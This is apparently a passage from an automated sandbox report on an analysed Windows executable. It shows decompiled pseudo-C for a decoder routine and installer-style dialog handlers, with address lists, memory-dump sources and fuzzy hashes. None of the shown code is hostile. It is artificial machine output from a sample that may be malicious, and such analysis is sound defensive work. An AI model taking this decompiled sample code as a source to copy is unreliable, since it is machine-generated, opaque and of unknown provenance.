							if(_v52 == 0 || _v28 == 1) {
								return _t168;
							} else {
								goto L64;
							}
						}
						_v44 = _t195 - 1;
						_v32 = _t299 + _t195 * 4 - 0x70;
						do {
							_t282 =  *_v32;
							if(_t282 == 0) {
								goto L61;
							}
							while(1) {
								_t283 = _t282 - 1;
								_t200 = _a28 + _t186;
								_v48 = _t283;
								_v24 = _t200;
								if(_v8 <= _t200) {
									goto L45;
								}
								L31:
								_v20 = _t283 + 1;
								do {
									_v16 = _v16 + 1;
									_t296 = _v28 - _v24;
									if(_t296 > _a28) {
										_t296 = _a28;
									}
									_t222 = _v8 - _v24;
									_t254 = 1 << _t222;
									if(1 <= _v20) {
										L40:
										_t256 =  *_a36;
										_t168 = 1 << _t222;
										_v40 = 1;
										_t274 = _t256 + 1;
										if(_t274 > 0x5a0) {
											goto L64;
										}
									} else {
										_t275 = _v32;
										_t263 = _t254 + (_t168 | 0xffffffff) - _v48;
										if(_t222 >= _t296) {
											goto L40;
										}
										while(1) {
											_t222 = _t222 + 1;
											if(_t222 >= _t296) {
												goto L40;
											}
											_t275 = _t275 + 4;
											_t264 = _t263 + _t263;
											_t175 =  *_t275;
											if(_t264 <= _t175) {
												goto L40;
											}
											_t263 = _t264 - _t175;
										}
										goto L40;
									}
									_t168 = _a32 + _t256 * 4;
									_t297 = _t299 + _v16 * 4 - 0xec;
									 *_a36 = _t274;
									_t259 = _v16;
									 *_t297 = _t168;
									if(_t259 == 0) {
										 *_a24 = _t168;
									} else {
										_t276 = _v12;
										_t298 =  *((intOrPtr*)(_t297 - 4));
										 *(_t299 + _t259 * 4 - 0xb0) = _t276;
										_a5 = _a28;
										_a4 = _t222;
										_t262 = _t276 >> _t186;
										_a6 = (_t168 - _t298 >> 2) - _t262;
										 *(_t298 + _t262 * 4) = _a4;
									}
									_t224 = _v24;
									_t186 = _t224;
									_t225 = _t224 + _a28;
									_v24 = _t225;
								} while (_v8 > _t225);
								L45:
								_t284 = _v36;
								_a5 = _v8 - _t186;
								if(_t284 < 0x42d6a8 + _a8 * 4) {
									_t205 =  *_t284;
									if(_t205 >= _a12) {
										_t207 = _t205 - _a12 + _t205 - _a12;
										_v36 =  &(_v36[1]);
										_a4 =  *((intOrPtr*)(_t207 + _a20)) + 0x50;
										_t208 =  *((intOrPtr*)(_t207 + _a16));
									} else {
										_a4 = (_t205 & 0xffffff00 | _t205 - 0x00000100 > 0x00000000) - 0x00000001 & 0x00000060;
										_t208 =  *_t284;
										_v36 =  &(_t284[1]);
									}
									_a6 = _t208;
								} else {
									_a4 = 0xc0;
								}
								_t286 = 1 << _v8 - _t186;
								_t244 = _v12 >> _t186;
								while(_t244 < _v40) {
									 *(_t168 + _t244 * 4) = _a4;
									_t244 = _t244 + _t286;
								}
								_t287 = _v12;
								_t246 = 1 << _v44;
								while((_t287 & _t246) != 0) {
									_t287 = _t287 ^ _t246;
									_t246 = _t246 >> 1;
								}
								_t288 = _t287 ^ _t246;
								_v20 = 1;
								_v12 = _t288;
								_t251 = _v16;
								if(((1 << _t186) - 0x00000001 & _t288) ==  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0))) {
									L60:
									if(_v48 != 0) {
										_t282 = _v48;
										_t283 = _t282 - 1;
										_t200 = _a28 + _t186;
										_v48 = _t283;
										_v24 = _t200;
										if(_v8 <= _t200) {
											goto L45;
										}
										goto L31;
									}
									break;
								} else {
									goto L58;
								}
								do {
									L58:
									_t186 = _t186 - _a28;
									_t251 = _t251 - 1;
								} while (((1 << _t186) - 0x00000001 & _v12) !=  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0)));
								_v16 = _t251;
								goto L60;
							}
							L61:
							_v8 = _v8 + 1;
							_v32 = _v32 + 4;
							_v44 = _v44 + 1;
						} while (_v8 <= _v28);
						goto L62;
					}
					_t277 = 0;
					do {
						_t192 = _t192 +  *((intOrPtr*)(_t299 + _t277 - 0x6c));
						_t277 = _t277 + 4;
						_t235 = _t235 - 1;
						 *((intOrPtr*)(_t299 + _t277 - 0xac)) = _t192;
					} while (_t235 != 0);
					goto L21;
				}
				 *_a24 =  *_a24 & 0x00000000;
				 *_a28 =  *_a28 & 0x00000000;
				return 0;
			}











































































                0x00407127
                0x0040712f
                0x00407133
                0x00407135
                0x00407138
                0x0040713a
                0x0040713a
                0x0040713c
                0x00407143
                0x00407145
                0x00407145
                0x0040714b
                0x00407160
                0x00407168
                0x0040716a
                0x0040716c
                0x0040716f
                0x00407170
                0x00407170
                0x00407176
                0x00000000
                0x00000000
                0x00407178
                0x0040717b
                0x00000000
                0x00000000
                0x00000000
                0x0040717b
                0x0040717f
                0x00407182
                0x00407184
                0x00407184
                0x00407187
                0x0040718d
                0x0040718e
                0x00000000
                0x00000000
                0x00000000
                0x0040718e
                0x00407193
                0x00407196
                0x00407198
                0x00407198
                0x0040719e
                0x004071a0
                0x004071b1
                0x004071a4
                0x004071a8
                0x0040744d
                0x00000000
                0x0040744d
                0x004071ae
                0x004071af
                0x004071af
                0x004071b7
                0x004071ba
                0x004071be
                0x004071c0
                0x004071c2
                0x004071c5
                0x00000000
                0x00000000
                0x004071cd
                0x004071d3
                0x004071d5
                0x004071d7
                0x004071d8
                0x004071ed
                0x004071ed
                0x004071f0
                0x004071f2
                0x004071f2
                0x004071f4
                0x004071f9
                0x004071fb
                0x00407202
                0x00407204
                0x0040720c
                0x0040720c
                0x0040720e
                0x0040720f
                0x0040721e
                0x00407222
                0x00407226
                0x00407229
                0x0040722c
                0x00407231
                0x00407234
                0x0040723a
                0x00407241
                0x00407247
                0x00407440
                0x00407440
                0x00407445
                0x00407454
                0x00000000
                0x00000000
                0x00000000
                0x00407445
                0x00407254
                0x00407257
                0x0040725a
                0x0040725d
                0x00407261
                0x00000000
                0x00000000
                0x0040726c
                0x0040726f
                0x00407270
                0x00407272
                0x00407278
                0x0040727b
                0x00000000
                0x00000000
                0x00407281
                0x00407282
                0x00407285
                0x00407288
                0x0040728b
                0x00407291
                0x00407293
                0x00407293
                0x0040729b
                0x0040729f
                0x004072a4
                0x004072c9
                0x004072cf
                0x004072d1
                0x004072d3
                0x004072d6
                0x004072df
                0x00000000
                0x00000000
                0x004072a6
                0x004072a6
                0x004072af
                0x004072b3
                0x00000000
                0x00000000
                0x004072c4
                0x004072c4
                0x004072c7
                0x00000000
                0x00000000
                0x004072b7
                0x004072ba
                0x004072bc
                0x004072c0
                0x00000000
                0x00000000
                0x004072c2
                0x004072c2
                0x00000000
                0x004072c4
                0x004072e8
                0x004072ee
                0x004072f8
                0x004072fa
                0x004072ff
                0x00407301
                0x00407337
                0x00407303
                0x00407303
                0x00407306
                0x00407309
                0x00407313
                0x00407316
                0x0040731d
                0x00407328
                0x0040732f
                0x0040732f
                0x00407339
                0x0040733c
                0x0040733e
                0x00407344
                0x00407344
                0x0040734d
                0x00407350
                0x00407355
                0x00407364
                0x0040736c
                0x00407371
                0x00407395
                0x0040739d
                0x004073a1
                0x004073a7
                0x00407373
                0x00407381
                0x00407384
                0x0040738a
                0x0040738a
                0x004073ab
                0x00407366
                0x00407366
                0x00407366
                0x004073bc
                0x004073c0
                0x004073cc
                0x004073c7
                0x004073ca
                0x004073ca
                0x004073d4
                0x004073d9
                0x004073e1
                0x004073dd
                0x004073df
                0x004073df
                0x004073e7
                0x004073e9
                0x004073f0
                0x004073fa
                0x00407404
                0x00407420
                0x00407424
                0x00407269
                0x0040726f
                0x00407270
                0x00407272
                0x00407278
                0x0040727b
                0x00000000
                0x00000000
                0x00000000
                0x0040727b
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00407406
                0x00407406
                0x00407406
                0x0040740b
                0x00407414
                0x0040741d
                0x00000000
                0x0040741d
                0x0040742a
                0x0040742a
                0x0040742d
                0x00407434
                0x00407437
                0x00000000
                0x0040725a
                0x004071da
                0x004071dc
                0x004071dc
                0x004071e0
                0x004071e3
                0x004071e4
                0x004071e4
                0x00000000
                0x004071dc
                0x00407150
                0x00407156
                0x00000000

                Memory Dump Source
                • Source File: 00000000.00000002.248243732.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.248234341.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.248254051.0000000000408000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.248263687.000000000040A000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248280292.0000000000415000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248287693.000000000041D000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248331314.000000000042C000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248350805.0000000000435000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248358270.0000000000438000.00000002.00020000.sdmp Download File
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 99f6c7e6b8620be82bccd3d2e3e98bb61de1be8b453b643f323292903d4af905
                • Instruction ID: 8f207273dfcdbc59f762b6c847d1a58b94b1624b669f9e87ec0d9a9138a8e2bc
                • Opcode Fuzzy Hash: 99f6c7e6b8620be82bccd3d2e3e98bb61de1be8b453b643f323292903d4af905
                • Instruction Fuzzy Hash: 0DC15A31E04259CBCF18CF68D4905EEBBB2BF98314F25826AD8567B380D734A942CF95
                Uniqueness

                Uniqueness Score: -1.00%

                Function 02282B1F, Relevance: .0, Instructions: 33COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.251449636.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 3a60233801de0e8d64e4fc61689fdab8e9d3162a2ace7c33a53d9f49bfda1752
                • Instruction ID: a299d0d8e9b10ca62ceeed6f7fdea941f445a233f6f953c64edc6e6e29257575
                • Opcode Fuzzy Hash: 3a60233801de0e8d64e4fc61689fdab8e9d3162a2ace7c33a53d9f49bfda1752
                • Instruction Fuzzy Hash: CA010C78A22249EFCB51DFA9C580A9DBBF5EB08620F1185A5EC14E7765D330EE509B40
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0228286F, Relevance: .0, Instructions: 10COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.251449636.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: f9ed70d17b65b173f63ea8bde167bd4dbe7c19cd1b27e585218ed96e6e4df4c6
                • Instruction ID: 58c6f5837427d6eca2c2deaad74ce6c6656098581891570576efec04afcca601
                • Opcode Fuzzy Hash: f9ed70d17b65b173f63ea8bde167bd4dbe7c19cd1b27e585218ed96e6e4df4c6
                • Instruction Fuzzy Hash: 42D001392A1A48CFC241CF4CD084E40B3F8FB0DA20B068092FA0A8BB32C334FC00DA80
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00404B80, Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 491windowmemoryCOMMON
                Download Yara Rule
                C-Code - Quality: 96%
                			E00404B80(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				long _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				signed char* _v32;
				int _v36;
				signed int _v44;
				int _v48;
				signed int* _v60;
				signed char* _v64;
				signed int _v68;
				long _v72;
				void* _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t203;
				intOrPtr _t206;
				intOrPtr _t207;
				long _t212;
				signed int _t216;
				signed int _t227;
				void* _t230;
				void* _t231;
				int _t237;
				long _t242;
				long _t243;
				signed int _t244;
				signed int _t250;
				signed int _t252;
				signed char _t253;
				signed char _t259;
				void* _t264;
				void* _t266;
				signed char* _t284;
				signed char _t285;
				long _t290;
				signed int _t300;
				signed int _t308;
				signed char* _t316;
				int _t320;
				int _t321;
				signed int* _t322;
				int _t323;
				long _t324;
				signed int _t325;
				long _t327;
				int _t328;
				signed int _t329;
				void* _t331;

				_v12 = GetDlgItem(_a4, 0x3f9);
				_v8 = GetDlgItem(_a4, 0x408);
				_t331 = SendMessageA;
				_v24 =  *0x42f468;
				_v28 =  *0x42f434 + 0x94;
				_t320 = 0x10;
				if(_a8 != 0x110) {
					L23:
					if(_a8 != 0x405) {
						_t298 = _a16;
					} else {
						_a12 = 0;
						_t298 = 1;
						_a8 = 0x40f;
						_a16 = 1;
					}
					if(_a8 == 0x4e || _a8 == 0x413) {
						_v16 = _t298;
						if(_a8 == 0x413 ||  *((intOrPtr*)(_t298 + 4)) == 0x408) {
							if(( *0x42f43d & 0x00000002) != 0) {
								L41:
								if(_v16 != 0) {
									_t242 = _v16;
									if( *((intOrPtr*)(_t242 + 8)) == 0xfffffe6e) {
										SendMessageA(_v8, 0x419, 0,  *(_t242 + 0x5c));
									}
									_t243 = _v16;
									if( *((intOrPtr*)(_t243 + 8)) == 0xfffffe6a) {
										_t298 = _v24;
										_t244 =  *(_t243 + 0x5c);
										if( *((intOrPtr*)(_t243 + 0xc)) != 2) {
											 *(_t244 * 0x418 + _t298 + 8) =  *(_t244 * 0x418 + _t298 + 8) & 0xffffffdf;
										} else {
											 *(_t244 * 0x418 + _t298 + 8) =  *(_t244 * 0x418 + _t298 + 8) | 0x00000020;
										}
									}
								}
								goto L48;
							}
							if(_a8 == 0x413) {
								L33:
								_t298 = 0 | _a8 != 0x00000413;
								_t250 = E00404ACE(_v8, _a8 != 0x413);
								_t325 = _t250;
								if(_t325 >= 0) {
									_t99 = _v24 + 8; // 0x8
									_t298 = _t250 * 0x418 + _t99;
									_t252 =  *_t298;
									if((_t252 & 0x00000010) == 0) {
										if((_t252 & 0x00000040) == 0) {
											_t253 = _t252 ^ 0x00000001;
										} else {
											_t259 = _t252 ^ 0x00000080;
											if(_t259 >= 0) {
												_t253 = _t259 & 0x000000fe;
											} else {
												_t253 = _t259 | 0x00000001;
											}
										}
										 *_t298 = _t253;
										E0040117D(_t325);
										_a12 = _t325 + 1;
										_a16 =  !( *0x42f43c) >> 0x00000008 & 0x00000001;
										_a8 = 0x40f;
									}
								}
								goto L41;
							}
							_t298 = _a16;
							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
								goto L41;
							}
							goto L33;
						} else {
							goto L48;
						}
					} else {
						L48:
						if(_a8 != 0x111) {
							L56:
							if(_a8 == 0x200) {
								SendMessageA(_v8, 0x200, 0, 0);
							}
							if(_a8 == 0x40b) {
								_t230 =  *0x42a874;
								if(_t230 != 0) {
									ImageList_Destroy(_t230);
								}
								_t231 =  *0x42a888;
								if(_t231 != 0) {
									GlobalFree(_t231);
								}
								 *0x42a874 = 0;
								 *0x42a888 = 0;
								 *0x42f4a0 = 0;
							}
							if(_a8 != 0x40f) {
								L90:
								if(_a8 == 0x420 && ( *0x42f43d & 0x00000001) != 0) {
									_t321 = (0 | _a16 == 0x00000020) << 3;
									ShowWindow(_v8, _t321);
									ShowWindow(GetDlgItem(_a4, 0x3fe), _t321);
								}
								goto L93;
							} else {
								E004011EF(_t298, 0, 0);
								_t203 = _a12;
								if(_t203 != 0) {
									if(_t203 != 0xffffffff) {
										_t203 = _t203 - 1;
									}
									_push(_t203);
									_push(8);
									E00404B4E();
								}
								if(_a16 == 0) {
									L75:
									E004011EF(_t298, 0, 0);
									_v36 =  *0x42a888;
									_t206 =  *0x42f468;
									_v64 = 0xf030;
									_v24 = 0;
									if( *0x42f46c <= 0) {
										L86:
										if( *0x42f42c == 4) {
											InvalidateRect(_v8, 0, 1);
										}
										_t207 =  *0x42ebfc; // 0x739685
										if( *((intOrPtr*)(_t207 + 0x10)) != 0) {
											E00404A89(0x3ff, 0xfffffffb, E00404AA1(5));
										}
										goto L90;
									}
									_t322 = _t206 + 8;
									do {
										_t212 =  *((intOrPtr*)(_v36 + _v24 * 4));
										if(_t212 != 0) {
											_t300 =  *_t322;
											_v72 = _t212;
											_v76 = 8;
											if((_t300 & 0x00000001) != 0) {
												_v76 = 9;
												_v60 =  &(_t322[4]);
												_t322[0] = _t322[0] & 0x000000fe;
											}
											if((_t300 & 0x00000040) == 0) {
												_t216 = (_t300 & 0x00000001) + 1;
												if((_t300 & 0x00000010) != 0) {
													_t216 = _t216 + 3;
												}
											} else {
												_t216 = 3;
											}
											_v68 = (_t216 << 0x0000000b | _t300 & 0x00000008) + (_t216 << 0x0000000b | _t300 & 0x00000008) | _t300 & 0x00000020;
											SendMessageA(_v8, 0x1102, (_t300 >> 0x00000005 & 0x00000001) + 1, _v72);
											SendMessageA(_v8, 0x110d, 0,  &_v76);
										}
										_v24 = _v24 + 1;
										_t322 =  &(_t322[0x106]);
									} while (_v24 <  *0x42f46c);
									goto L86;
								} else {
									_t323 = E004012E2( *0x42a888);
									E00401299(_t323);
									_t227 = 0;
									_t298 = 0;
									if(_t323 <= 0) {
										L74:
										SendMessageA(_v12, 0x14e, _t298, 0);
										_a16 = _t323;
										_a8 = 0x420;
										goto L75;
									} else {
										goto L71;
									}
									do {
										L71:
										if( *((intOrPtr*)(_v28 + _t227 * 4)) != 0) {
											_t298 = _t298 + 1;
										}
										_t227 = _t227 + 1;
									} while (_t227 < _t323);
									goto L74;
								}
							}
						}
						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
							goto L93;
						} else {
							_t237 = SendMessageA(_v12, 0x147, 0, 0);
							if(_t237 == 0xffffffff) {
								goto L93;
							}
							_t324 = SendMessageA(_v12, 0x150, _t237, 0);
							if(_t324 == 0xffffffff ||  *((intOrPtr*)(_v28 + _t324 * 4)) == 0) {
								_t324 = 0x20;
							}
							E00401299(_t324);
							SendMessageA(_a4, 0x420, 0, _t324);
							_a12 = _a12 | 0xffffffff;
							_a16 = 0;
							_a8 = 0x40f;
							goto L56;
						}
					}
				} else {
					_v36 = 0;
					 *0x42f4a0 = _a4;
					_v20 = 2;
					 *0x42a888 = GlobalAlloc(0x40,  *0x42f46c << 2);
					_t264 = LoadImageA( *0x42f420, 0x6e, 0, 0, 0, 0);
					 *0x42a87c =  *0x42a87c | 0xffffffff;
					_v16 = _t264;
					 *0x42a884 = SetWindowLongA(_v8, 0xfffffffc, E00405192);
					_t266 = ImageList_Create(_t320, _t320, 0x21, 6, 0);
					 *0x42a874 = _t266;
					ImageList_AddMasked(_t266, _v16, 0xff00ff);
					SendMessageA(_v8, 0x1109, 2,  *0x42a874);
					if(SendMessageA(_v8, 0x111c, 0, 0) < _t320) {
						SendMessageA(_v8, 0x111b, _t320, 0);
					}
					DeleteObject(_v16);
					_t327 = 0;
					do {
						_t272 =  *((intOrPtr*)(_v28 + _t327 * 4));
						if( *((intOrPtr*)(_v28 + _t327 * 4)) != 0) {
							if(_t327 != 0x20) {
								_v20 = 0;
							}
							SendMessageA(_v12, 0x151, SendMessageA(_v12, 0x143, 0, E0040618A(0, _t327, _t331, 0, _t272)), _t327);
						}
						_t327 = _t327 + 1;
					} while (_t327 < 0x21);
					_t328 = _a16;
					_push( *((intOrPtr*)(_t328 + 0x30 + _v20 * 4)));
					_push(0x15);
					E0040417B(_a4);
					_push( *((intOrPtr*)(_t328 + 0x34 + _v20 * 4)));
					_push(0x16);
					E0040417B(_a4);
					_t329 = 0;
					_v16 = 0;
					if( *0x42f46c <= 0) {
						L19:
						SetWindowLongA(_v8, 0xfffffff0, GetWindowLongA(_v8, 0xfffffff0) & 0x000000fb);
						goto L20;
					} else {
						_t316 = _v24 + 8;
						_v32 = _t316;
						do {
							_t284 =  &(_t316[0x10]);
							if( *_t284 != 0) {
								_v64 = _t284;
								_t285 =  *_t316;
								_v88 = _v16;
								_t308 = 0x20;
								_v84 = 0xffff0002;
								_v80 = 0xd;
								_v68 = _t308;
								_v44 = _t329;
								_v72 = _t285 & _t308;
								if((_t285 & 0x00000002) == 0) {
									if((_t285 & 0x00000004) == 0) {
										 *( *0x42a888 + _t329 * 4) = SendMessageA(_v8, 0x1100, 0,  &_v88);
									} else {
										_v16 = SendMessageA(_v8, 0x110a, 3, _v16);
									}
								} else {
									_v80 = 0x4d;
									_v48 = 1;
									_t290 = SendMessageA(_v8, 0x1100, 0,  &_v88);
									_v36 = 1;
									 *( *0x42a888 + _t329 * 4) = _t290;
									_v16 =  *( *0x42a888 + _t329 * 4);
								}
							}
							_t329 = _t329 + 1;
							_t316 =  &(_v32[0x418]);
							_v32 = _t316;
						} while (_t329 <  *0x42f46c);
						if(_v36 != 0) {
							L20:
							if(_v20 != 0) {
								E004041B0(_v8);
								goto L23;
							} else {
								ShowWindow(_v12, 5);
								E004041B0(_v12);
								L93:
								return E004041E2(_a8, _a12, _a16);
							}
						}
						goto L19;
					}
				}
			}


























































                0x00404b9e
                0x00404ba6
                0x00404bae
                0x00404bb4
                0x00404bcc
                0x00404bcf
                0x00404bd0
                0x00404dfd
                0x00404e04
                0x00404e18
                0x00404e06
                0x00404e08
                0x00404e0b
                0x00404e0c
                0x00404e13
                0x00404e13
                0x00404e24
                0x00404e32
                0x00404e35
                0x00404e4b
                0x00404ec0
                0x00404ec3
                0x00404ec5
                0x00404ecf
                0x00404edd
                0x00404edd
                0x00404edf
                0x00404ee9
                0x00404eef
                0x00404ef2
                0x00404ef5
                0x00404f10
                0x00404ef7
                0x00404f01
                0x00404f01
                0x00404ef5
                0x00404ee9
                0x00000000
                0x00404ec3
                0x00404e50
                0x00404e5b
                0x00404e60
                0x00404e67
                0x00404e6c
                0x00404e70
                0x00404e7b
                0x00404e7b
                0x00404e7f
                0x00404e83
                0x00404e87
                0x00404e9a
                0x00404e89
                0x00404e89
                0x00404e90
                0x00404e96
                0x00404e92
                0x00404e92
                0x00404e92
                0x00404e90
                0x00404e9e
                0x00404ea0
                0x00404eb3
                0x00404eb6
                0x00404eb9
                0x00404eb9
                0x00404e83
                0x00000000
                0x00404e70
                0x00404e52
                0x00404e59
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00404f13
                0x00404f13
                0x00404f1a
                0x00404f8b
                0x00404f93
                0x00404f9b
                0x00404f9b
                0x00404fa4
                0x00404fa6
                0x00404fad
                0x00404fb0
                0x00404fb0
                0x00404fb6
                0x00404fbd
                0x00404fc0
                0x00404fc0
                0x00404fc6
                0x00404fcc
                0x00404fd2
                0x00404fd2
                0x00404fdf
                0x0040513f
                0x00405146
                0x00405163
                0x00405169
                0x0040517b
                0x0040517b
                0x00000000
                0x00404fe5
                0x00404fe7
                0x00404fec
                0x00404ff1
                0x00404ff6
                0x00404ff8
                0x00404ff8
                0x00404ff9
                0x00404ffa
                0x00404ffc
                0x00404ffc
                0x00405004
                0x00405045
                0x00405047
                0x00405057
                0x0040505a
                0x0040505f
                0x00405066
                0x00405069
                0x0040510b
                0x00405113
                0x0040511b
                0x0040511b
                0x00405121
                0x00405129
                0x0040513a
                0x0040513a
                0x00000000
                0x00405129
                0x0040506f
                0x00405072
                0x00405078
                0x0040507d
                0x0040507f
                0x00405081
                0x00405087
                0x0040508e
                0x00405093
                0x0040509a
                0x0040509d
                0x0040509d
                0x004050a4
                0x004050b0
                0x004050b4
                0x004050b6
                0x004050b6
                0x004050a6
                0x004050a8
                0x004050a8
                0x004050d6
                0x004050e2
                0x004050f1
                0x004050f1
                0x004050f3
                0x004050f6
                0x004050ff
                0x00000000
                0x00405006
                0x00405011
                0x00405014
                0x00405019
                0x0040501b
                0x0040501f
                0x0040502f
                0x00405039
                0x0040503b
                0x0040503e
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00405021
                0x00405021
                0x00405027
                0x00405029
                0x00405029
                0x0040502a
                0x0040502b
                0x00000000
                0x00405021
                0x00405004
                0x00404fdf
                0x00404f22
                0x00000000
                0x00404f38
                0x00404f42
                0x00404f47
                0x00000000
                0x00000000
                0x00404f59
                0x00404f5e
                0x00404f6a
                0x00404f6a
                0x00404f6c
                0x00404f7b
                0x00404f7d
                0x00404f81
                0x00404f84
                0x00000000
                0x00404f84
                0x00404f22
                0x00404bd6
                0x00404bd9
                0x00404bdc
                0x00404bec
                0x00404bff
                0x00404c0a
                0x00404c10
                0x00404c1e
                0x00404c31
                0x00404c36
                0x00404c41
                0x00404c4a
                0x00404c60
                0x00404c70
                0x00404c7c
                0x00404c7c
                0x00404c81
                0x00404c87
                0x00404c89
                0x00404c8c
                0x00404c91
                0x00404c96
                0x00404c98
                0x00404c98
                0x00404cb8
                0x00404cb8
                0x00404cba
                0x00404cbb
                0x00404cc0
                0x00404cc6
                0x00404cca
                0x00404ccf
                0x00404cd7
                0x00404cdb
                0x00404ce0
                0x00404ce5
                0x00404ced
                0x00404cf0
                0x00404dbf
                0x00404dd2
                0x00000000
                0x00404cf6
                0x00404cf9
                0x00404cfc
                0x00404cff
                0x00404cff
                0x00404d04
                0x00404d0d
                0x00404d10
                0x00404d14
                0x00404d17
                0x00404d1a
                0x00404d23
                0x00404d2c
                0x00404d2f
                0x00404d32
                0x00404d35
                0x00404d73
                0x00404d9e
                0x00404d75
                0x00404d84
                0x00404d84
                0x00404d37
                0x00404d3a
                0x00404d48
                0x00404d52
                0x00404d5a
                0x00404d61
                0x00404d6c
                0x00404d6c
                0x00404d35
                0x00404da4
                0x00404da5
                0x00404db1
                0x00404db1
                0x00404dbd
                0x00404dd8
                0x00404ddb
                0x00404df8
                0x00000000
                0x00404ddd
                0x00404de2
                0x00404deb
                0x0040517d
                0x0040518f
                0x0040518f
                0x00404ddb
                0x00000000
                0x00404dbd
                0x00404cf0

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.248243732.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.248234341.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.248254051.0000000000408000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.248263687.000000000040A000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248280292.0000000000415000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248287693.000000000041D000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248331314.000000000042C000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248350805.0000000000435000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248358270.0000000000438000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                • String ID: $M$N
                • API String ID: 2564846305-813528018
                • Opcode ID: 05a311050dda4b414fd1261923b8e6b7691581466e425b0fd9ae4ea99a1d7fb6
                • Instruction ID: 99b70255f3faedab1c4ad885451b662392dfc0d6b29454a89b749d4faaca394f
                • Opcode Fuzzy Hash: 05a311050dda4b414fd1261923b8e6b7691581466e425b0fd9ae4ea99a1d7fb6
                • Instruction Fuzzy Hash: 5D027DB0A00209AFDB20DF94DD85AAE7BB5FB44354F50813AF610BA2E0D7798D52CF58
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00403CA7, Relevance: 48.3, APIs: 32, Instructions: 346windowstringCOMMON
                Download Yara Rule
                C-Code - Quality: 84%
                			E00403CA7(struct HWND__* _a4, signed int _a8, int _a12, long _a16) {
				struct HWND__* _v32;
				void* _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				signed int _t37;
				signed int _t39;
				struct HWND__* _t49;
				signed int _t68;
				struct HWND__* _t74;
				signed int _t87;
				struct HWND__* _t92;
				signed int _t100;
				int _t104;
				signed int _t116;
				signed int _t117;
				int _t118;
				signed int _t123;
				struct HWND__* _t126;
				struct HWND__* _t127;
				int _t128;
				long _t131;
				int _t133;
				int _t134;
				void* _t135;
				void* _t143;

				_t116 = _a8;
				if(_t116 == 0x110 || _t116 == 0x408) {
					_t35 = _a12;
					_t126 = _a4;
					__eflags = _t116 - 0x110;
					 *0x42a878 = _t35;
					if(_t116 == 0x110) {
						 *0x42f428 = _t126;
						 *0x42a88c = GetDlgItem(_t126, 1);
						_t92 = GetDlgItem(_t126, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x429858 = _t92;
						E0040417B(_t126);
						SetClassLongA(_t126, 0xfffffff2,  *0x42ec08);
						 *0x42ebec = E0040140B(4);
						_t35 = 1;
						__eflags = 1;
						 *0x42a878 = 1;
					}
					_t123 =  *0x40a1dc; // 0xffffffff
					_t134 = 0;
					_t131 = (_t123 << 6) +  *0x42f460;
					__eflags = _t123;
					if(_t123 < 0) {
						L34:
						E004041C7(0x40b);
						while(1) {
							_t37 =  *0x42a878;
							 *0x40a1dc =  *0x40a1dc + _t37;
							_t131 = _t131 + (_t37 << 6);
							_t39 =  *0x40a1dc; // 0xffffffff
							__eflags = _t39 -  *0x42f464;
							if(_t39 ==  *0x42f464) {
								E0040140B(1);
							}
							__eflags =  *0x42ebec - _t134; // 0x0
							if(__eflags != 0) {
								break;
							}
							__eflags =  *0x40a1dc -  *0x42f464; // 0xffffffff
							if(__eflags >= 0) {
								break;
							}
							_t117 =  *(_t131 + 0x14);
							E0040618A(_t117, _t126, _t131, 0x437800,  *((intOrPtr*)(_t131 + 0x24)));
							_push( *((intOrPtr*)(_t131 + 0x20)));
							_push(0xfffffc19);
							E0040417B(_t126);
							_push( *((intOrPtr*)(_t131 + 0x1c)));
							_push(0xfffffc1b);
							E0040417B(_t126);
							_push( *((intOrPtr*)(_t131 + 0x28)));
							_push(0xfffffc1a);
							E0040417B(_t126);
							_t49 = GetDlgItem(_t126, 3);
							__eflags =  *0x42f4cc - _t134;
							_v32 = _t49;
							if( *0x42f4cc != _t134) {
								_t117 = _t117 & 0x0000fefd | 0x00000004;
								__eflags = _t117;
							}
